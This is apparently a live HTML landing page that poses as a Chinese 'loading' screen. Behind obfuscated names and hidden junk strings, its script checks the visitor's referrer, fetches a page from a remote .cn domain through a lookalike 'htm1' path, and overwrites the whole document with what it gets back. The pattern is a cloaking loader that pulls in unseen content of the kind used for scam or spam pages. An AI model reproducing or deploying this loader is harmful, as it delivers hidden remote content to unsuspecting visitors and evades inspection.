<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .uBataE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .uBataE .Gq282NErpNk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .uBataE .content {
            line-height: 50px;
            text-align: center
        }

        .uBataE .img {
            width: 100%
        }

        .uBataE .HIS5GIR4 {
            text-align: center
        }

        .uBataE .HIS5GIR4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .uBataE .HIS5GIR4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .uBataE .HIS5GIR4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .uBataE .HIS5GIR4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .uBataE .HIS5GIR4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .uBataE .HIS5GIR4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .uBataE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YBvMv7N02(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yQ4pa = YBvMv7N02('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yQ4pa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yQ4pa +".html?a=share";
		}
		
        gIp9csIFx5=url+"#"+new Date().getTime();
        gIp9csIFx5 && function() {
            $.get(gIp9csIFx5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >GTnB71nTVdbuvaykCdiIltbhxFaRjQr</ul>
<img  src='' style='display:none'>
<li style='display:none' >H2cuprFFvCpuieYrTgm5p4wDC5fjK0QVC</li><div class="uBataE">
    <div class="Gq282NErpNk">
        <div class="HIS5GIR4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >dO5a6pPCEWQSyxUDCZYBI69pGFU1</li>
<li style='display:none' >dO5a6pPCEWQSyxUDCZYBI69pGFU1</li>
<li style='display:none' >dO5a6pPCEWQSyxUDCZYBI69pGFU1</li>
<p  style='display:none'>RNFSukgbOEdBQhlZ9Cv2z9ps4NCwXnhL8rwFMaxmoKahwU6GA2PKFhfM9VMlIsW8Er2</p></body>
</html>